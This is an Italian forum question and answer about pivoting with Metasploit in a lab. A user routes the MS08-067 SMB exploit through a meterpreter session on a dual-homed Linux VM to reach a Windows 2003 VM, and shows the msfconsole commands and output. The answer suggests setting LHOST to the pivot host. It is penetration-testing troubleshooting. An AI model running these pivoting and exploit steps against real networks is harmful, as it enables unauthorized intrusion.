Pivoting con Metasploit

3

Sto cercando di sfruttare una VM Windows su una sottorete diversa dietro una VM Linux dual home in cui ho già una shell. Per semplificare, ho una shell reverse_tcp meterpreter sulla VM Linux (192.168.47.144) e la VM Windows (192.168.128.133) è 2003 e vulnerabile a MS08-067 (l'ho testata direttamente). Infine, la VM Linux può sicuramente colpire il servizio SMB sulla VM di Windows.

ubuntu:~$ ip -o addr show | grep -o '192.168.47.144' && nc -nvv 192.168.128.133 445
192.168.47.144
Connection to 192.168.128.133 445 port [tcp/*] succeeded!

La shell meterpreter reverse_tcp sulla VM Linux si ricollega alla porta 5555, quindi non c'è un conflitto con il numero di porta.

[*] Sending stage (826872 bytes) to 192.168.47.144
[*] Meterpreter session 2 opened (192.168.47.136:5555 -> 192.168.47.144:47395) at 2017-10-08 11:21:30 -0500

msf exploit(handler) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > route add 192.168.128.0 255.255.255.0 2
[*] Route added
msf exploit(ms08_067_netapi) > route

IPv4 Active Routing Table
=========================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.128.0      255.255.255.0      Session 2

[*] There are currently no IPv6 routes defined.
msf exploit(ms08_067_netapi) > set RHOST 192.168.128.133
RHOST => 192.168.128.133
msf exploit(ms08_067_netapi) > exploit 

[*] Started reverse TCP handler on 192.168.47.136:4444 
[*] 192.168.128.133:445 - Automatically detecting the target...
[*] 192.168.128.133:445 - Fingerprint: Windows 2003 R2 - Service Pack 2 - lang:Unknown
[*] 192.168.128.133:445 - We could not detect the language pack, defaulting to English
[*] 192.168.128.133:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.128.133:445 - Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.

Inoltre ho dato a questa una corsa con LHOST 0.0.0.0 e LHOST 192.168.128.132 (l'indirizzo di subnet .128 della VM Linux), ma nessuna shell neanche lì. Cosa mi manca?

Ho anche provato a farlo manualmente attraverso il port forward di SSH come visto in link e ho finito con lo stesso risultato. L'exploit colpisce la VM di Windows ma non viene aperta alcuna sessione.

Questi sono i post principali a cui ho fatto riferimento.

  1. link
  2. link
  3. link
posta B-MO 09.10.2017 - 01:47
fonte

1 risposta

0

Quando usi il tunneling attraverso percorsi meterpreter in Metasploit, il tuo lhost diventerà il tuo primo obiettivo.

Quindi in questo caso il tuo LHOST deve essere impostato su: 192.168.47.144

Prova.

    
risposta data 25.10.2018 - 16:53
fonte

Leggi altre domande sui tag